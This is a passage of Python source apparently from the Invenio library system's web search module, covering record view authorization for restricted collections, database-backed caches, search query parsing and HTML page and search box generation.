for collection in restricted_collection_cache.cache:
ret |= get_collection_reclist(collection)
return ret
def get_restricted_collections_for_recid(recid, recreate_cache_if_needed=True):
"""
Return the list of restricted collection names to which recid belongs.
"""
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
collection_reclist_cache.recreate_cache_if_needed()
return [collection for collection in restricted_collection_cache.cache if recid in get_collection_reclist(collection, recreate_cache_if_needed=False)]
def is_user_owner_of_record(user_info, recid):
"""
Check if the user is owner of the record, i.e. he is the submitter
    and/or belongs to an owner-like group authorized to 'see' the record.
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
@param recid: the record identifier.
@type recid: positive integer
@return: True if the user is 'owner' of the record; False otherwise
@rtype: bool
"""
authorized_emails_or_group = []
for tag in CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS:
authorized_emails_or_group.extend(get_fieldvalues(recid, tag))
for email_or_group in authorized_emails_or_group:
if email_or_group in user_info['group']:
return True
email = email_or_group.strip().lower()
if user_info['email'].strip().lower() == email:
return True
return False
### FIXME: This method needs to be refactored
def is_user_viewer_of_record(user_info, recid):
"""
    Check if the user is allowed to view the record based on the MARC tags
inside CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
i.e. his email is inside the 506__m tag or he is inside an e-group listed
in the 506__m tag
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
@param recid: the record identifier.
@type recid: positive integer
    @return: True if the user is 'allowed to view' the record; False otherwise
@rtype: bool
"""
authorized_emails_or_group = []
for tag in CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS:
authorized_emails_or_group.extend(get_fieldvalues(recid, tag))
for email_or_group in authorized_emails_or_group:
if email_or_group in user_info['group']:
return True
email = email_or_group.strip().lower()
if user_info['email'].strip().lower() == email:
return True
return False
def check_user_can_view_record(user_info, recid):
"""
Check if the user is authorized to view the given recid. The function
grants access in two cases: either user has author rights on this
record, or he has view rights to the primary collection this record
belongs to.
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
@param recid: the record identifier.
@type recid: positive integer
@return: (0, ''), when authorization is granted, (>0, 'message') when
authorization is not granted
@rtype: (int, string)
"""
policy = CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY.strip().upper()
if isinstance(recid, str):
recid = int(recid)
## At this point, either webcoll has not yet run or there are some
    ## restricted collections. Let's see first if the user owns the record.
if is_user_owner_of_record(user_info, recid):
## Perfect! It's authorized then!
return (0, '')
if is_user_viewer_of_record(user_info, recid):
## Perfect! It's authorized then!
return (0, '')
restricted_collections = get_restricted_collections_for_recid(recid, recreate_cache_if_needed=False)
if not restricted_collections and record_public_p(recid):
## The record is public and not part of any restricted collection
return (0, '')
if restricted_collections:
## If there are restricted collections the user must be authorized to all/any of them (depending on the policy)
auth_code, auth_msg = 0, ''
for collection in restricted_collections:
(auth_code, auth_msg) = acc_authorize_action(user_info, VIEWRESTRCOLL, collection=collection)
if auth_code and policy != 'ANY':
## Ouch! the user is not authorized to this collection
return (auth_code, auth_msg)
elif auth_code == 0 and policy == 'ANY':
## Good! At least one collection is authorized
return (0, '')
## Depending on the policy, the user will be either authorized or not
return auth_code, auth_msg
if is_record_in_any_collection(recid, recreate_cache_if_needed=False):
## the record is not in any restricted collection
return (0, '')
elif record_exists(recid) > 0:
## We are in the case where webcoll has not run.
## Let's authorize SUPERADMIN
(auth_code, auth_msg) = acc_authorize_action(user_info, VIEWRESTRCOLL, collection=None)
if auth_code == 0:
return (0, '')
else:
## Too bad. Let's print a nice message:
return (1, """The record you are trying to access has just been
submitted to the system and needs to be assigned to the
proper collections. It is currently restricted for security reasons
                until the assignment is fully completed. Please come back later to
properly access this record.""")
else:
        ## The record either does not exist or has been deleted.
## Let's handle these situations outside of this code.
return (0, '')
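# Behaviour summary (descriptive, derived from the code above): with
# CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY set to 'ANY', authorization for at least one of the
# record's restricted collections is enough to obtain (0, ''); with any other policy value
# the user must be authorized for every restricted collection the record belongs to.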
class IndexStemmingDataCacher(DataCacher):
"""
Provides cache for stemming information for word/phrase indexes.
This class is not to be used directly; use function
get_index_stemming_language() instead.
"""
def __init__(self):
def cache_filler():
try:
res = run_sql("""SELECT id, stemming_language FROM idxINDEX""")
except DatabaseError:
# database problems, return empty cache
return {}
return dict(res)
def timestamp_verifier():
return get_table_update_time('idxINDEX')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
index_stemming_cache.is_ok_p
except Exception:
index_stemming_cache = IndexStemmingDataCacher()
def get_index_stemming_language(index_id, recreate_cache_if_needed=True):
"""Return stemming langugage for given index."""
if recreate_cache_if_needed:
index_stemming_cache.recreate_cache_if_needed()
return index_stemming_cache.cache[index_id]
class FieldTokenizerDataCacher(DataCacher):
"""
Provides cache for tokenizer information for fields corresponding to indexes.
This class is not to be used directly; use function
get_field_tokenizer_type() instead.
"""
def __init__(self):
def cache_filler():
try:
res = run_sql("""SELECT fld.code, ind.tokenizer FROM idxINDEX AS ind, field AS fld, idxINDEX_field AS indfld WHERE ind.id = indfld.id_idxINDEX AND indfld.id_field = fld.id""")
except DatabaseError:
# database problems, return empty cache
return {}
return dict(res)
def timestamp_verifier():
return get_table_update_time('idxINDEX')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
field_tokenizer_cache.is_ok_p
except Exception:
field_tokenizer_cache = FieldTokenizerDataCacher()
def get_field_tokenizer_type(field_name, recreate_cache_if_needed=True):
"""Return tokenizer type for given field corresponding to an index if applicable."""
if recreate_cache_if_needed:
field_tokenizer_cache.recreate_cache_if_needed()
tokenizer = None
try:
tokenizer = field_tokenizer_cache.cache[field_name]
except KeyError:
return None
return tokenizer
class CollectionRecListDataCacher(DataCacher):
"""
Provides cache for collection reclist hitsets. This class is not
to be used directly; use function get_collection_reclist() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT name FROM collection")
except Exception:
# database problems, return empty cache
return {}
for name in res:
ret[name[0]] = None # this will be filled later during runtime by calling get_collection_reclist(coll)
return ret
def timestamp_verifier():
return get_table_update_time('collection')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_reclist_cache.is_ok_p:
raise Exception
except Exception:
collection_reclist_cache = CollectionRecListDataCacher()
def get_collection_reclist(coll, recreate_cache_if_needed=True):
"""Return hitset of recIDs that belong to the collection 'coll'."""
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
if coll not in collection_reclist_cache.cache:
return intbitset() # collection does not exist; return empty set
if not collection_reclist_cache.cache[coll]:
# collection's reclist not in the cache yet, so calculate it
# and fill the cache:
reclist = intbitset()
query = "SELECT nbrecs,reclist FROM collection WHERE name=%s"
res = run_sql(query, (coll, ), 1)
if res:
try:
reclist = intbitset(res[0][1])
except:
pass
collection_reclist_cache.cache[coll] = reclist
# finally, return reclist:
return collection_reclist_cache.cache[coll]
def get_available_output_formats(visible_only=False):
"""
Return the list of available output formats. When visible_only is
True, returns only those output formats that have visibility flag
set to 1.
"""
formats = []
query = "SELECT code,name FROM format"
if visible_only:
query += " WHERE visibility='1'"
query += " ORDER BY name ASC"
res = run_sql(query)
if res:
# propose found formats:
for code, name in res:
formats.append({ 'value' : code,
'text' : name
})
else:
formats.append({'value' : 'hb',
'text' : "HTML brief"
})
return formats
# Flask cache for search results.
from invenio.websearch_cache import search_results_cache, get_search_results_cache_key
class CollectionI18nNameDataCacher(DataCacher):
"""
Provides cache for I18N collection names. This class is not to be
used directly; use function get_coll_i18nname() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT c.name,cn.ln,cn.value FROM collectionname AS cn, collection AS c WHERE cn.id_collection=c.id AND cn.type='ln'") # ln=long name
except Exception:
# database problems
return {}
for c, ln, i18nname in res:
if i18nname:
if not ret.has_key(c):
ret[c] = {}
ret[c][ln] = i18nname
return ret
def timestamp_verifier():
return get_table_update_time('collectionname')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_i18nname_cache.is_ok_p:
raise Exception
except Exception:
collection_i18nname_cache = CollectionI18nNameDataCacher()
def get_coll_i18nname(c, ln=CFG_SITE_LANG, verify_cache_timestamp=True):
"""
Return nicely formatted collection name (of the name type `ln'
(=long name)) for collection C in language LN.
This function uses collection_i18nname_cache, but it verifies
whether the cache is up-to-date first by default. This
verification step is performed by checking the DB table update
time. So, if you call this function 1000 times, it can get very
slow because it will do 1000 table update time verifications, even
    though collection names do not change that often.
Hence the parameter VERIFY_CACHE_TIMESTAMP which, when set to
False, will assume the cache is already up-to-date. This is
useful namely in the generation of collection lists for the search
results page.
"""
if verify_cache_timestamp:
collection_i18nname_cache.recreate_cache_if_needed()
out = c
try:
out = collection_i18nname_cache.cache[c][ln]
except KeyError:
pass # translation in LN does not exist
return out
class FieldI18nNameDataCacher(DataCacher):
"""
Provides cache for I18N field names. This class is not to be used
directly; use function get_field_i18nname() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT f.name,fn.ln,fn.value FROM fieldname AS fn, field AS f WHERE fn.id_field=f.id AND fn.type='ln'") # ln=long name
except Exception:
# database problems, return empty cache
return {}
for f, ln, i18nname in res:
if i18nname:
if not ret.has_key(f):
ret[f] = {}
ret[f][ln] = i18nname
return ret
def timestamp_verifier():
return get_table_update_time('fieldname')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not field_i18nname_cache.is_ok_p:
raise Exception
except Exception:
field_i18nname_cache = FieldI18nNameDataCacher()
def get_field_i18nname(f, ln=CFG_SITE_LANG, verify_cache_timestamp=True):
"""
Return nicely formatted field name (of type 'ln', 'long name') for
field F in language LN.
If VERIFY_CACHE_TIMESTAMP is set to True, then verify DB timestamp
and field I18N name cache timestamp and refresh cache from the DB
if needed. Otherwise don't bother checking DB timestamp and
return the cached value. (This is useful when get_field_i18nname
is called inside a loop.)
"""
if verify_cache_timestamp:
field_i18nname_cache.recreate_cache_if_needed()
out = f
try:
out = field_i18nname_cache.cache[f][ln]
except KeyError:
pass # translation in LN does not exist
return out
def get_alphabetically_ordered_collection_list(level=0, ln=CFG_SITE_LANG):
"""Returns nicely ordered (score respected) list of collections, more exactly list of tuples
(collection name, printable collection name).
Suitable for create_search_box()."""
out = []
res = run_sql("SELECT name FROM collection ORDER BY name ASC")
for c_name in res:
c_name = c_name[0]
# make a nice printable name (e.g. truncate c_printable for
# long collection names in given language):
c_printable_fullname = get_coll_i18nname(c_name, ln, False)
c_printable = wash_index_term(c_printable_fullname, 30, False)
if c_printable != c_printable_fullname:
c_printable = c_printable + "..."
if level:
c_printable = " " + level * '-' + " " + c_printable
out.append([c_name, c_printable])
return out
def get_nicely_ordered_collection_list(collid=1, level=0, ln=CFG_SITE_LANG):
"""Returns nicely ordered (score respected) list of collections, more exactly list of tuples
(collection name, printable collection name).
Suitable for create_search_box()."""
colls_nicely_ordered = []
res = run_sql("""SELECT c.name,cc.id_son FROM collection_collection AS cc, collection AS c
WHERE c.id=cc.id_son AND cc.id_dad=%s ORDER BY score DESC""", (collid, ))
for c, cid in res:
# make a nice printable name (e.g. truncate c_printable for
# long collection names in given language):
c_printable_fullname = get_coll_i18nname(c, ln, False)
c_printable = wash_index_term(c_printable_fullname, 30, False)
if c_printable != c_printable_fullname:
c_printable = c_printable + "..."
if level:
c_printable = " " + level * '-' + " " + c_printable
colls_nicely_ordered.append([c, c_printable])
colls_nicely_ordered = colls_nicely_ordered + get_nicely_ordered_collection_list(cid, level+1, ln=ln)
return colls_nicely_ordered
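# Illustrative (hedged): the recursion above returns a flat list whose entries are
# [collection_name, printable_name], with printable names of nested collections prefixed
# by " - ", " -- ", ... according to their depth (the `level` argument).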
def get_index_id_from_field(field):
"""
Return index id with name corresponding to FIELD, or the first
index id where the logical field code named FIELD is indexed.
Return zero in case there is no index defined for this field.
Example: field='author', output=4.
"""
out = 0
if not field:
field = 'global' # empty string field means 'global' index (field 'anyfield')
# first look in the index table:
res = run_sql("""SELECT id FROM idxINDEX WHERE name=%s""", (field,))
if res:
out = res[0][0]
return out
# not found in the index table, now look in the field table:
res = run_sql("""SELECT w.id FROM idxINDEX AS w, idxINDEX_field AS wf, field AS f
WHERE f.code=%s AND wf.id_field=f.id AND w.id=wf.id_idxINDEX
LIMIT 1""", (field,))
if res:
out = res[0][0]
return out
def get_words_from_pattern(pattern):
"""
Returns list of whitespace-separated words from pattern, removing any
trailing punctuation-like signs from words in pattern.
"""
words = {}
# clean trailing punctuation signs inside pattern
pattern = re_punctuation_followed_by_space.sub(' ', pattern)
for word in string.split(pattern):
if not words.has_key(word):
words[word] = 1
return words.keys()
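# Illustrative example (assuming ',' is listed in CFG_BIBINDEX_CHARS_PUNCTUATION):
#   get_words_from_pattern("nuclear physics, muon")
#   would typically return ['nuclear', 'physics', 'muon'] (order not guaranteed, since a
#   dict is used for de-duplication).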
def create_basic_search_units(req, p, f, m=None, of='hb'):
"""Splits search pattern and search field into a list of independently searchable units.
- A search unit consists of '(operator, pattern, field, type, hitset)' tuples where
'operator' is set union (|), set intersection (+) or set exclusion (-);
'pattern' is either a word (e.g. muon*) or a phrase (e.g. 'nuclear physics');
'field' is either a code like 'title' or MARC tag like '100__a';
'type' is the search type ('w' for word file search, 'a' for access file search).
- Optionally, the function accepts the match type argument 'm'.
If it is set (e.g. from advanced search interface), then it
performs this kind of matching. If it is not set, then a guess is made.
'm' can have values: 'a'='all of the words', 'o'='any of the words',
'p'='phrase/substring', 'r'='regular expression',
'e'='exact value'.
- Warnings are printed on req (when not None) in case of HTML output formats."""
opfts = [] # will hold (o,p,f,t,h) units
# FIXME: quick hack for the journal index
if f == 'journal':
opfts.append(['+', p, f, 'w'])
return opfts
## check arguments: is desired matching type set?
if m:
## A - matching type is known; good!
if m == 'e':
# A1 - exact value:
opfts.append(['+', p, f, 'a']) # '+' since we have only one unit
elif m == 'p':
# A2 - phrase/substring:
opfts.append(['+', "%" + p + "%", f, 'a']) # '+' since we have only one unit
elif m == 'r':
# A3 - regular expression:
opfts.append(['+', p, f, 'r']) # '+' since we have only one unit
elif m == 'a' or m == 'w':
# A4 - all of the words:
p = strip_accents(p) # strip accents for 'w' mode, FIXME: delete when not needed
for word in get_words_from_pattern(p):
opfts.append(['+', word, f, 'w']) # '+' in all units
elif m == 'o':
# A5 - any of the words:
p = strip_accents(p) # strip accents for 'w' mode, FIXME: delete when not needed
for word in get_words_from_pattern(p):
if len(opfts)==0:
opfts.append(['+', word, f, 'w']) # '+' in the first unit
else:
opfts.append(['|', word, f, 'w']) # '|' in further units
else:
if of.startswith("h"):
write_warning("Matching type '%s' is not implemented yet." % cgi.escape(m), "Warning", req=req)
opfts.append(['+', "%" + p + "%", f, 'w'])
else:
## B - matching type is not known: let us try to determine it by some heuristics
if f and p[0] == '"' and p[-1] == '"':
## B0 - does 'p' start and end by double quote, and is 'f' defined? => doing ACC search
opfts.append(['+', p[1:-1], f, 'a'])
elif f in ('author', 'firstauthor', 'exactauthor', 'exactfirstauthor', 'authorityauthor') and author_name_requires_phrase_search(p):
## B1 - do we search in author, and does 'p' contain space/comma/dot/etc?
## => doing washed ACC search
opfts.append(['+', p, f, 'a'])
elif f and p[0] == "'" and p[-1] == "'":
## B0bis - does 'p' start and end by single quote, and is 'f' defined? => doing ACC search
opfts.append(['+', '%' + p[1:-1] + '%', f, 'a'])
elif f and p[0] == "/" and p[-1] == "/":
## B0ter - does 'p' start and end by a slash, and is 'f' defined? => doing regexp search
opfts.append(['+', p[1:-1], f, 'r'])
elif f and string.find(p, ',') >= 0:
## B1 - does 'p' contain comma, and is 'f' defined? => doing ACC search
opfts.append(['+', p, f, 'a'])
elif f and str(f[0:2]).isdigit():
## B2 - does 'f' exist and starts by two digits? => doing ACC search
opfts.append(['+', p, f, 'a'])
else:
## B3 - doing WRD search, but maybe ACC too
# search units are separated by spaces unless the space is within single or double quotes
# so, let us replace temporarily any space within quotes by '__SPACE__'
p = re_pattern_single_quotes.sub(lambda x: "'"+string.replace(x.group(1), ' ', '__SPACE__')+"'", p)
p = re_pattern_double_quotes.sub(lambda x: "\""+string.replace(x.group(1), ' ', '__SPACE__')+"\"", p)
p = re_pattern_regexp_quotes.sub(lambda x: "/"+string.replace(x.group(1), ' ', '__SPACE__')+"/", p)
# and spaces after colon as well:
p = re_pattern_spaces_after_colon.sub(lambda x: string.replace(x.group(1), ' ', '__SPACE__'), p)
# wash argument:
p = re_logical_and.sub(" ", p)
p = re_logical_or.sub(" |", p)
p = re_logical_not.sub(" -", p)
p = re_operators.sub(r' \1', p)
for pi in string.split(p): # iterate through separated units (or items, as "pi" stands for "p item")
pi = re_pattern_space.sub(" ", pi) # replace back '__SPACE__' by ' '
# firstly, determine set operator
if pi[0] == '+' or pi[0] == '-' or pi[0] == '|':
oi = pi[0]
pi = pi[1:]
else:
# okay, there is no operator, so let us decide what to do by default
oi = '+' # by default we are doing set intersection...
# secondly, determine search pattern and field:
if string.find(pi, ":") > 0:
fi, pi = string.split(pi, ":", 1)
fi = wash_field(fi)
# test whether fi is a real index code or a MARC-tag defined code:
if fi in get_fieldcodes() or '00' <= fi[:2] <= '99':
pass
else:
# it is not, so join it back:
fi, pi = f, fi + ":" + pi
else:
fi, pi = f, pi
# wash 'fi' argument:
fi = wash_field(fi)
# wash 'pi' argument:
pi = pi.strip() # strip eventual spaces
if re_quotes.match(pi):
# B3a - quotes are found => do ACC search (phrase search)
if pi[0] == '"' and pi[-1] == '"':
pi = string.replace(pi, '"', '') # remove quote signs
opfts.append([oi, pi, fi, 'a'])
elif pi[0] == "'" and pi[-1] == "'":
pi = string.replace(pi, "'", "") # remove quote signs
opfts.append([oi, "%" + pi + "%", fi, 'a'])
else: # unbalanced quotes, so fall back to WRD query:
opfts.append([oi, pi, fi, 'w'])
elif pi.startswith('/') and pi.endswith('/'):
# B3b - pi has slashes around => do regexp search
opfts.append([oi, pi[1:-1], fi, 'r'])
elif fi and len(fi) > 1 and str(fi[0]).isdigit() and str(fi[1]).isdigit():
# B3c - fi exists and starts by two digits => do ACC search
opfts.append([oi, pi, fi, 'a'])
elif fi and not get_index_id_from_field(fi) and get_field_name(fi):
# B3d - logical field fi exists but there is no WRD index for fi => try ACC search
opfts.append([oi, pi, fi, 'a'])
else:
# B3e - general case => do WRD search
pi = strip_accents(pi) # strip accents for 'w' mode, FIXME: delete when not needed
for pii in get_words_from_pattern(pi):
opfts.append([oi, pii, fi, 'w'])
## sanity check:
for i in range(0, len(opfts)):
try:
pi = opfts[i][1]
if pi == '*':
if of.startswith("h"):
write_warning("Ignoring standalone wildcard word.", "Warning", req=req)
del opfts[i]
if pi == '' or pi == ' ':
fi = opfts[i][2]
if fi:
if of.startswith("h"):
write_warning("Ignoring empty <em>%s</em> search term." % fi, "Warning", req=req)
del opfts[i]
except:
pass
## replace old logical field names if applicable:
if CFG_WEBSEARCH_FIELDS_CONVERT:
opfts = [[o, p, wash_field(f), t] for o, p, f, t in opfts]
## return search units:
return opfts
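# Illustrative example (hedged; exact output depends on the configured indexes and on
# CFG_WEBSEARCH_FIELDS_CONVERT): a word-mode query such as
#   create_basic_search_units(None, 'quark gluon', 'title', m='a')
# would typically yield the two units ['+', 'quark', 'title', 'w'] and
# ['+', 'gluon', 'title', 'w'] (order not guaranteed).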
def page_start(req, of, cc, aas, ln, uid, title_message=None,
description='', keywords='', recID=-1, tab='', p='', em=''):
"""
Start page according to given output format.
@param title_message: title of the page, not escaped for HTML
@param description: description of the page, not escaped for HTML
@param keywords: keywords of the page, not escaped for HTML
"""
_ = gettext_set_language(ln)
if not req or isinstance(req, cStringIO.OutputType):
return # we were called from CLI
if not title_message:
title_message = _("Search Results")
content_type = get_output_format_content_type(of)
if of.startswith('x'):
if of == 'xr':
# we are doing RSS output
req.content_type = "application/rss+xml"
req.send_http_header()
req.write("""<?xml version="1.0" encoding="UTF-8"?>\n""")
else:
# we are doing XML output:
req.content_type = get_output_format_content_type(of, 'text/xml')
req.send_http_header()
req.write("""<?xml version="1.0" encoding="UTF-8"?>\n""")
elif of.startswith('t') or str(of[0:3]).isdigit():
# we are doing plain text output:
req.content_type = "text/plain"
req.send_http_header()
elif of == "intbitset":
req.content_type = "application/octet-stream"
req.send_http_header()
elif of == "id":
pass # nothing to do, we shall only return list of recIDs
elif content_type == 'text/html':
# we are doing HTML output:
req.content_type = "text/html"
req.send_http_header()
if not description:
description = "%s %s." % (cc, _("Search Results"))
if not keywords:
keywords = "%s, WebSearch, %s" % (get_coll_i18nname(CFG_SITE_NAME, ln, False), get_coll_i18nname(cc, ln, False))
## generate RSS URL:
argd = {}
if req.args:
argd = cgi.parse_qs(req.args)
rssurl = websearch_templates.build_rss_url(argd)
## add MathJax if displaying single records (FIXME: find
## eventual better place to this code)
if of.lower() in CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS:
metaheaderadd = get_mathjax_header(req.is_https())
else:
metaheaderadd = ''
# Add metadata in meta tags for Google scholar-esque harvesting...
# only if we have a detailed meta format and we are looking at a
# single record
if (recID != -1 and CFG_WEBSEARCH_DETAILED_META_FORMAT):
metaheaderadd += format_record(recID, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
ln = ln)
## generate navtrail:
navtrail = create_navtrail_links(cc, aas, ln)
if navtrail != '':
navtrail += ' > '
if (tab != '' or ((of != '' or of.lower() != 'hd') and of != 'hb')) and \
recID != -1:
# If we are not in information tab in HD format, customize
# the nav. trail to have a link back to main record. (Due
# to the way perform_request_search() works, hb
# (lowercase) is equal to hd)
navtrail += ' <a class="navtrail" href="%s/%s/%s">%s</a>' % \
(CFG_SITE_URL, CFG_SITE_RECORD, recID, cgi.escape(title_message))
if (of != '' or of.lower() != 'hd') and of != 'hb':
# Export
format_name = of
query = "SELECT name FROM format WHERE code=%s"
res = run_sql(query, (of,))
if res:
format_name = res[0][0]
navtrail += ' > ' + format_name
else:
# Discussion, citations, etc. tabs
tab_label = get_detailed_page_tabs(cc, ln=ln)[tab]['label']
navtrail += ' > ' + _(tab_label)
else:
navtrail += cgi.escape(title_message)
if p:
# we are serving search/browse results pages, so insert pattern:
navtrail += ": " + cgi.escape(p)
title_message = p + " - " + title_message
body_css_classes = []
if cc:
            # we know the collection, so let's allow page styles based on cc.
            # Collection names may not satisfy the rules for CSS classes,
            # which are something like: -?[_a-zA-Z]+[_a-zA-Z0-9-]*
            # However, it isn't clear what we should do about cases with
            # numbers, so we leave them to fail. Everything else becomes "_".
css = nmtoken_from_string(cc).replace('.','_').replace('-','_').replace(':','_')
body_css_classes.append(css)
## finally, print page header:
if em == '' or EM_REPOSITORY["header"] in em:
req.write(pageheaderonly(req=req, title=title_message,
navtrail=navtrail,
description=description,
keywords=keywords,
metaheaderadd=metaheaderadd,
uid=uid,
language=ln,
navmenuid='search',
navtrail_append_title_p=0,
rssurl=rssurl,
body_css_classes=body_css_classes))
req.write(websearch_templates.tmpl_search_pagestart(ln=ln))
else:
req.content_type = content_type
req.send_http_header()
def page_end(req, of="hb", ln=CFG_SITE_LANG, em=""):
"End page according to given output format: e.g. close XML tags, add HTML footer, etc."
if of == "id":
return [] # empty recID list
if of == "intbitset":
return intbitset()
if not req:
return # we were called from CLI
if of.startswith('h'):
req.write(websearch_templates.tmpl_search_pageend(ln = ln)) # pagebody end
if em == "" or EM_REPOSITORY["footer"] in em:
req.write(pagefooteronly(lastupdated=__lastupdated__, language=ln, req=req))
return
def create_page_title_search_pattern_info(p, p1, p2, p3):
"""Create the search pattern bit for the page <title> web page
HTML header. Basically combine p and (p1,p2,p3) together so that
the page header may be filled whether we are in the Simple Search
or Advanced Search interface contexts."""
out = ""
if p:
out = p
else:
out = p1
if p2:
out += ' ' + p2
if p3:
out += ' ' + p3
return out
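# Illustrative sketch of create_page_title_search_pattern_info() (hypothetical
# values, kept as a comment so that nothing is executed at import time):
#
#     create_page_title_search_pattern_info('ellis', 'a', 'b', 'c')
#     # -> 'ellis'        (the simple search pattern 'p' wins when present)
#     create_page_title_search_pattern_info('', 'ellis', 'muon', '')
#     # -> 'ellis muon'   (the advanced search patterns are concatenated)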
def create_inputdate_box(name="d1", selected_year=0, selected_month=0, selected_day=0, ln=CFG_SITE_LANG):
"Produces 'From Date', 'Until Date' kind of selection box. Suitable for search options."
_ = gettext_set_language(ln)
box = ""
# day
box += """<select name="%sd">""" % name
box += """<option value="">%s""" % _("any day")
for day in range(1, 32):
box += """<option value="%02d"%s>%02d""" % (day, is_selected(day, selected_day), day)
box += """</select>"""
# month
box += """<select name="%sm">""" % name
box += """<option value="">%s""" % _("any month")
# trailing space in May distinguishes short/long form of the month name
for mm, month in [(1, _("January")), (2, _("February")), (3, _("March")), (4, _("April")), \
(5, _("May ")), (6, _("June")), (7, _("July")), (8, _("August")), \
(9, _("September")), (10, _("October")), (11, _("November")), (12, _("December"))]:
box += """<option value="%02d"%s>%s""" % (mm, is_selected(mm, selected_month), month.strip())
box += """</select>"""
# year
box += """<select name="%sy">""" % name
box += """<option value="">%s""" % _("any year")
this_year = int(time.strftime("%Y", time.localtime()))
for year in range(this_year-20, this_year+1):
box += """<option value="%d"%s>%d""" % (year, is_selected(year, selected_year), year)
box += """</select>"""
return box
def create_search_box(cc, colls, p, f, rg, sf, so, sp, rm, of, ot, aas,
ln, p1, f1, m1, op1, p2, f2, m2, op2, p3, f3,
m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec,
action="", em=""):
"""Create search box for 'search again in the results page' functionality."""
if em != "" and EM_REPOSITORY["search_box"] not in em:
if EM_REPOSITORY["body"] in em and cc != CFG_SITE_NAME:
return '''
<h1 class="headline">%(ccname)s</h1>''' % {'ccname' : cgi.escape(cc), }
else:
return ""
# load the right message language
_ = gettext_set_language(ln)
# some computations
cc_intl = get_coll_i18nname(cc, ln, False)
cc_colID = get_colID(cc)
colls_nicely_ordered = []
if cfg_nicely_ordered_collection_list:
colls_nicely_ordered = get_nicely_ordered_collection_list(ln=ln)
else:
colls_nicely_ordered = get_alphabetically_ordered_collection_list(ln=ln)
colls_nice = []
for (cx, cx_printable) in colls_nicely_ordered:
if not cx.startswith("Unnamed collection"):
colls_nice.append({ 'value' : cx,
'text' : cx_printable
})
coll_selects = []
if colls and colls[0] != CFG_SITE_NAME:
# some collections are defined, so print these first, and only then print 'add another collection' heading:
for c in colls:
if c:
temp = []
temp.append({ 'value' : CFG_SITE_NAME,
'text' : '*** %s ***' % _("any public collection")
})
# this field is used to remove the current collection from the ones to be searched.
temp.append({ 'value' : '',
'text' : '*** %s ***' % _("remove this collection")
})
for val in colls_nice:
# print collection:
                    if not val['value'].startswith("Unnamed collection"):
temp.append({ 'value' : val['value'],
'text' : val['text'],
'selected' : (c == re.sub("^[\s\-]*","", val['value']))
})
coll_selects.append(temp)
coll_selects.append([{ 'value' : '',
'text' : '*** %s ***' % _("add another collection")
}] + colls_nice)
else: # we searched in CFG_SITE_NAME, so print 'any public collection' heading
coll_selects.append([{ 'value' : CFG_SITE_NAME,
'text' : '*** %s ***' % _("any public collection")
}] + colls_nice)
## ranking methods
ranks = [{
'value' : '',
'text' : "- %s %s -" % (_("OR").lower (), _("rank by")),
}]
for (code, name) in get_bibrank_methods(cc_colID, ln):
# propose found rank methods:
ranks.append({
'value' : code,
'text' : name,
})
formats = get_available_output_formats(visible_only=True)
# show collections in the search box? (not if there is only one
# collection defined, and not if we are in light search)
show_colls = True
show_title = True
if len(collection_reclist_cache.cache.keys()) == 1 or \
aas == -1:
show_colls = False
show_title = False
if cc == CFG_SITE_NAME:
show_title = False
if CFG_INSPIRE_SITE:
show_title = False
return websearch_templates.tmpl_search_box(
ln = ln,
aas = aas,
cc_intl = cc_intl,
cc = cc,
ot = ot,
sp = sp,
action = action,
fieldslist = get_searchwithin_fields(ln=ln, colID=cc_colID),
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
p1 = p1,
p2 = p2,
p3 = p3,
op1 = op1,
op2 = op2,
rm = rm,
p = p,
f = f,
coll_selects = coll_selects,
d1y = d1y, d2y = d2y, d1m = d1m, d2m = d2m, d1d = d1d, d2d = d2d,
dt = dt,
sort_fields = get_sortby_fields(ln=ln, colID=cc_colID),
sf = sf,
so = so,
ranks = ranks,
sc = sc,
rg = rg,
formats = formats,
of = of,
pl = pl,
jrec = jrec,
ec = ec,
show_colls = show_colls,
show_title = show_title and (em=="" or EM_REPOSITORY["body"] in em)
)
def create_exact_author_browse_help_link(p=None, p1=None, p2=None, p3=None, f=None, f1=None, f2=None, f3=None,
rm=None, cc=None, ln=None, jrec=None, rg=None, aas=0, action=""):
"""Creates a link to help switch from author to exact author while browsing"""
if action == 'browse':
search_fields = (f, f1, f2, f3)
if ('author' in search_fields) or ('firstauthor' in search_fields):
def add_exact(field):
if field == 'author' or field == 'firstauthor':
return 'exact' + field
return field
(fe, f1e, f2e, f3e) = map(add_exact, search_fields)
link_name = f or f1
link_name = (link_name == 'firstauthor' and 'exact first author') or 'exact author'
return websearch_templates.tmpl_exact_author_browse_help_link(p=p, p1=p1, p2=p2, p3=p3, f=fe, f1=f1e, f2=f2e, f3=f3e,
rm=rm, cc=cc, ln=ln, jrec=jrec, rg=rg, aas=aas, action=action,
link_name=link_name)
return ""
def create_navtrail_links(cc=CFG_SITE_NAME, aas=0, ln=CFG_SITE_LANG, self_p=1, tab=''):
"""Creates navigation trail links, i.e. links to collection
ancestors (except Home collection). If aas==1, then links to
Advanced Search interfaces; otherwise Simple Search.
"""
dads = []
for dad in get_coll_ancestors(cc):
if dad != CFG_SITE_NAME: # exclude Home collection
dads.append ((dad, get_coll_i18nname(dad, ln, False)))
